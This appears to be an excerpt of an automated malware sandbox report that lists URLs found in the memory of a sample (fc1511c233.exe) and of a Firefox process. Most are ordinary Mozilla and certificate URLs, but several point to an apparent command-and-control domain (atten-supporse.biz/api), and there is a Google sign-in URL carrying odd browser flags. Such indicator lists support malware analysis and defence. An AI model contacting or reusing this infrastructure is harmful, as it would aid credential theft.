                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 0000002F.00000002.3502039099.000001F944259000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.htmlresetPrincipalToInheritToNullPrincipalLOAD_MEDIA_SNIFF
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerUseOfReleaseEventsWarningUse
                          Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B04C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                          Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E08C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E08C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E08C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F932803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/stringsP
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: http://fb.me/use-check-prop-types
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: http://fb.me/use-check-prop-typesG
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3453979007.000001F942703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3457437110.000001F942CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3616491974.000001F94639D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3394344261.000001F9434CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3393617956.000001F9433F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3504039978.000001F944368000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3616491974.000001F9463B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3392279109.000001F9434EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3458520897.000001F942DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E2E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3457437110.000001F942C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3551249065.000001F944A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413609052.000001F944259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3461899011.000001F9433F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3393214051.000001F9434E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3504039978.000001F944315000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3392411243.000001F9434CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3464541516.000001F9436F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F9445A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0.
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0W
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F9445A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: http://stackoverflow.com/questions/30030031)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%sMust
                          Source: file.exe, file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updateSERVICE_NOT_ENOUGH_COMMAND_LINE_ARGSSERVICE_STILL_APPLYING_NO_
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatex
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 0000002F.00000002.3570570274.000001F944D85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulCan
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulPanelUI._onNotificationButtonEvent(even
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/search
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
                          Source: firefox.exe, 0000002F.00000002.3570570274.000001F944DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderQuick
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderRemot
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Startu
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761101162.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F9438A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/
                          Source: firefox.exe, 0000002F.00000002.3468613380.000001F943C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 0000002F.00000002.3640517520.000001F94AE67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3361530870.000001F942700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/instrumentIndividualClass
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 0000002F.00000002.3464541516.000001F94361D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.ca
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.caextensions.experiments.enabledPREF_UPDATE_REQUIREBUILTINCERTSfully-perso
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3570570274.000001F944DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3640517520.000001F94AE5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3640517520.000001F94AEAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 0000002F.00000002.3436300890.000001F932589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3418749970.000001F943BB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F944581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94470A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com/
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.0000000001441000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3430105657.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3360462516.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3359994759.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3341908004.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393346845.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000002.3322642385.000000000152D000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001529000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3320013727.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                          Source: fc1511c233.exe, 0000001B.00000003.3316698804.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3314921050.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/$$M
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/%
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/1$
                          Source: fc1511c233.exe, 0000001B.00000003.3360534576.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393675987.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3391599259.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3430105657.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3360462516.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3359994759.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3341908004.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393346845.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/?
                          Source: fc1511c233.exe, 0000001B.00000003.3360534576.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393675987.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3391599259.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3430105657.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3360462516.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3359994759.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3341908004.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393346845.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/_
                          Source: fc1511c233.exe, 0000001B.00000002.3428013900.0000000001441000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3360346452.000000000149F000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3430105657.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3341908004.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3314282504.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000002.3322642385.000000000152D000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000002.3322642385.0000000001515000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001529000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3320013727.000000000152C000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000002.3322395694.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiK
                          Source: fc1511c233.exe, 00000020.00000002.3322642385.0000000001515000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiMv
                          Source: fc1511c233.exe, 00000020.00000003.3319359990.0000000001529000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000002.3322642385.0000000001529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiR
                          Source: fc1511c233.exe, 00000020.00000002.3322395694.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apim
                          Source: fc1511c233.exe, 0000001B.00000002.3428013900.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiq
                          Source: fc1511c233.exe, 00000020.00000002.3322642385.000000000152D000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001529000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3320013727.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/mm
                          Source: fc1511c233.exe, 0000001B.00000003.3316698804.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3314921050.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.00000000014A6000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api
                          Source: fc1511c233.exe, 00000020.00000002.3322642385.0000000001515000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api#
                          Source: fc1511c233.exe, 00000020.00000002.3322642385.0000000001515000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001515000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/apicryptPrimitives.dll:
                          Source: firefox.exe, 0000002F.00000002.3462736194.000001F94354D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                          Source: firefox.exe, 0000002F.00000002.3462736194.000001F94356A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
